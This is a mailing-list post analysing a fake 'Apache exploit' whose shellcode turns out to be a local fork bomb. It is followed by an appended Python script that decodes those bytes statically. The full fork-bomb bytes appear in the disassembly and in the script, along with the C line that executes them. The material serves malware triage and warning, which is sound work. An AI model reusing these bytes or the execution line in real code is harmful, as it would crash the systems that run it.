On Friday 20 June 2003 11:15 am, Michael wrote:
> Maybe now we can STFU and concentrate on actual disclosure?
> I'm curious as to why there has been no discussion about this apache
> report.
>
> The poster of this message didn't include any info on the details of the
> problem nor an exploit, which leaves us wondering. (The insult was cute
> though)
There was exploit code included in the message I got. Taking apart the
shellcode we see:

    0:  31 db             xor  %ebx,%ebx
    2:  31 c0             xor  %eax,%eax
    4:  31 d2             xor  %edx,%edx
    6:  b2 18             mov  $0x18,%dl
    8:  68 20 3f 21 0a    push $0xa213f20     ; " ?!\n"
    d:  68 54 52 31 58    push $0x58315254    ; "TR1X"
    12: 68 65 20 4d 34    push $0x344d2065    ; "e M4"
    17: 68 73 20 54 68    push $0x68542073    ; "s Th"
    1c: 68 61 74 20 69    push $0x69207461    ; "at i"
    21: 68 2d 2d 57 68    push $0x68572d2d    ; "--Wh"
    26: 89 e1             mov  %esp,%ecx      ; pointer to string
    28: b0 04             mov  $0x4,%al
    2a: cd 80             int  $0x80          ; syscall_write
    2c: b8 02 00 00 00    mov  $0x2,%eax
    31: cd 80             int  $0x80          ; syscall_fork
    33: eb f7             jmp  0x2c           ; loop
    ... garbage code follows

So, the shellcode is a fork bomb, printing "--What is The M4TR1X ?!" over
and over until the system can no longer fork processes.

Looking at the C code, we see this line:

    void(*b)()=(void*)shellcode;b();

Which executes the shellcode locally. In other words, don't run this.

-Joe

-- 
Joe Stewart, GCIH
Senior Intrusion Analyst
LURHQ Corporation
http://www.lurhq.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
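The analysis above can be reproduced without ever jumping into the buffer. The following script is an added example, not part of Joe's post or of the original "exploit": it walks the 53 bytes quoted in the disassembly as data, decodes only the handful of opcodes this sample uses (xor reg,reg; push imm32; mov al/dl/eax,imm; mov ecx,esp; int 0x80; jmp rel8), reassembles the string from the pushed immediates in stack order, names the Linux syscall numbers that reach `int 0x80`, and flags the backward jump around the fork call. The byte string and the syscall table are transcribed from the post; the function names are my own.

```python
import struct

# Shellcode bytes transcribed from the disassembly quoted in the post.
# Treated purely as data: nothing here executes it.
SHELLCODE = bytes.fromhex(
    "31db31c031d2b218"      # xor ebx,ebx / xor eax,eax / xor edx,edx / mov dl,0x18
    "68203f210a"            # push " ?!\n"
    "6854523158"            # push "TR1X"
    "6865204d34"            # push "e M4"
    "6873205468"            # push "s Th"
    "6861742069"            # push "at i"
    "682d2d5768"            # push "--Wh"
    "89e1b004cd80"          # mov ecx,esp / mov al,4 / int 0x80
    "b802000000cd80"        # mov eax,2 / int 0x80
    "ebf7"                  # jmp -9 (back to mov eax,2)
)

# Only the two Linux i386 syscall numbers this sample uses.
LINUX_SYSCALLS = {2: "fork", 4: "write"}


def analyze(code):
    """Static walk over the decoded subset; returns what the code would do."""
    eax = ebx = edx = 0          # all three are zeroed by the leading xors
    pushes = []                  # dwords pushed, in execution order
    syscalls = []                # (offset, name, eax, ebx, edx) at each int 0x80
    jumps = []                   # (offset, target) for each jmp rel8
    ip = 0
    while ip < len(code):
        op = code[ip]
        if op == 0x31:                                  # xor r/m32,r32 (reg,reg form)
            ip += 2
        elif op == 0x68:                                # push imm32
            pushes.append(code[ip + 1:ip + 5]); ip += 5
        elif op == 0xB0:                                # mov al, imm8
            eax = (eax & ~0xFF) | code[ip + 1]; ip += 2
        elif op == 0xB2:                                # mov dl, imm8
            edx = (edx & ~0xFF) | code[ip + 1]; ip += 2
        elif op == 0xB8:                                # mov eax, imm32
            eax = struct.unpack("<I", code[ip + 1:ip + 5])[0]; ip += 5
        elif op == 0x89 and code[ip + 1] == 0xE1:       # mov ecx, esp
            ip += 2
        elif op == 0xCD and code[ip + 1] == 0x80:       # int 0x80
            name = LINUX_SYSCALLS.get(eax, "sys_%d" % eax)
            syscalls.append((ip, name, eax, ebx, edx)); ip += 2
        elif op == 0xEB:                                # jmp rel8
            rel = struct.unpack("<b", code[ip + 1:ip + 2])[0]
            jumps.append((ip, ip + 2 + rel)); ip += 2
        else:
            break                                       # unknown opcode: stop, do not guess

    # The last push lands at the lowest address, so the string reads in reverse push order.
    message = b"".join(reversed(pushes)).decode("ascii", "replace")

    write_len = next((s[4] for s in syscalls if s[1] == "write"), None)
    fork_offsets = [s[0] for s in syscalls if s[1] == "fork"]
    # A backward jump that encloses a fork call is the fork-bomb signature.
    fork_loop = any(tgt <= src and any(tgt <= f <= src for f in fork_offsets)
                    for src, tgt in jumps)

    return {
        "message": message,
        "syscalls": [s[1] for s in syscalls],
        "write_fd": next((s[3] for s in syscalls if s[1] == "write"), None),
        "write_length": write_len,
        "length_matches": write_len == len(message),
        "fork_loop": fork_loop,
    }


if __name__ == "__main__":
    for k, v in analyze(SHELLCODE).items():
        print("%-15s %r" % (k, v))
```

The `length_matches` check is the kind of cross-check worth keeping in a triage script: the `mov $0x18,%dl` argument equals the 24 bytes assembled by the six pushes, which confirms the string really is what `write` sends and that the decoder did not mis-align on a push. The decoder deliberately stops at the first opcode it does not know rather than guessing, which is also where the post's "garbage code follows" would begin.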
